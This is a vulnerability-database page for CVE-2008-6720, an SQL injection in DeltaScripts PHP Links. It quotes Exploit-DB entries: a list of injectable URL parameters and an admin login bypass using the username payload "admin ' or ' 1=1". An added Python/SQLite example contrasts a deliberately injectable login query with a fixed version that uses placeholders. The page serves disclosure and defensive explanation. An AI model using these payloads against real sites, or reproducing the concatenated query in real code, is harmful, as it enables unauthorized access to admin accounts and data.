CVE-2008-6720
Published 2009-04-13
Priority P342 · high · 7.5 (CVSS 2.0)
CVSS 2.0 vector: AV:N/AC:L/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 0.97% (57.6th percentile)
SQL injection vulnerability in admin/adm_login.php in DeltaScripts PHP Links 1.3 and earlier allows remote attackers to execute arbitrary SQL commands via the admin_username parameter (aka the admin field).
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| deltascripts | php_links | <= 1.3 | — |
No detection rules found.
Exploit-DB
DELTAScripts PHP Links - Multiple SQL Injections
exploitdb·2012-09-10
---
source: https://www.securityfocus.com/bid/55478/info
DeltaScripts PHP Links is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
DeltaScripts PHP Links 2012 is vulnerable; other versions may also be affected.
http://www.example.com/phplinks/index.php?catid=[SQL]
http://www.example.com/phplinks/review.php?id=[SQL]
http://www.example.com/phplinks/search.php?search=[SQL]
http://www.example.com/phplinks/admin/adm_fill_options.php?field=[SQL]
http://www.example.com/phplinks/vote.ph
Exploit-DB
DELTAScripts PHP Links 1.3 - Authentication Bypass
exploitdb·2008-11-06
---
[~] deltascripts phplinks Remote Auth Bypass Vulnerability
[~]
[~] ----------------------------------------------------------
[~] Discovered By: ZoRLu
[~]
[~] Date: 06.11.2008
[~]
[~] Home: www.z0rlu.blogspot.com
[~]
[~] contact: [email protected]
[~]
[~] Note: loneliness lost its meaning in my loneliness : ( (
[~]
[~] -----------------------------------------------------------
Exploit:
username: [real_admin_name] ' or ' 1=1
password: ZoRLu
note: generally admin name: admin
admin login for demo:
http://localhost/classifieds/admin/login.php
example for demo:
admin: admin ' or ' 1=1
passwd: ZoRLu
example 2:
admin login:
http://localhost/anunturi/admin/login.php
admin: admin ' or ' 1=1
passwd: ZoRLu
[~]----------------
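Why the admin_username value quoted above is accepted without the real password, and how placeholder binding stops it, shown as an added Python/SQLite example that is not DeltaScripts' code or part of the Exploit-DB entry. The table, the query shape and the function names are assumptions, since the page does not show admin/adm_login.php, and SQLite's RTRIM collation stands in for MySQL PAD SPACE string comparison.

```python
import hashlib
import hmac
import sqlite3

SALT = b"constructed-demo-salt"  # constructed; use a random per-user salt in practice


def pw_hash(password: str) -> str:
    return hashlib.pbkdf2_hmac("sha256", password.encode(), SALT, 100_000).hex()


def make_db() -> sqlite3.Connection:
    # Hypothetical schema. COLLATE RTRIM mimics MySQL PAD SPACE collations,
    # under which 'admin ' compares equal to 'admin'.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE admins ("
               "username TEXT COLLATE RTRIM PRIMARY KEY, pw_hash TEXT)")
    db.execute("INSERT INTO admins VALUES (?, ?)",
               ("admin", pw_hash("constructed-secret")))
    return db


def vulnerable_login(db, admin_username: str, admin_password: str) -> bool:
    # Assumed shape of the flawed check: input is concatenated into the SQL
    # text, so a quote in admin_username ends the string literal early.
    # AND binds tighter than OR, so the statement becomes
    #   username = 'admin ' OR (' 1=1' AND pw_hash = '...')
    # and the left side alone is true for an existing admin name.
    sql = ("SELECT 1 FROM admins WHERE username = '" + admin_username +
           "' AND pw_hash = '" + pw_hash(admin_password) + "'")
    return db.execute(sql).fetchone() is not None


def safe_login(db, admin_username: str, admin_password: str) -> bool:
    # Placeholder binding: the value is sent as data and never parsed as SQL,
    # so the whole input is compared as one literal username.
    row = db.execute("SELECT pw_hash FROM admins WHERE username = ?",
                     (admin_username,)).fetchone()
    if row is None:
        return False
    return hmac.compare_digest(row[0], pw_hash(admin_password))
```

In the PHP application the same fix is a PDO or mysqli prepared statement with bound parameters for both login fields.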
No writeups or analysis indexed.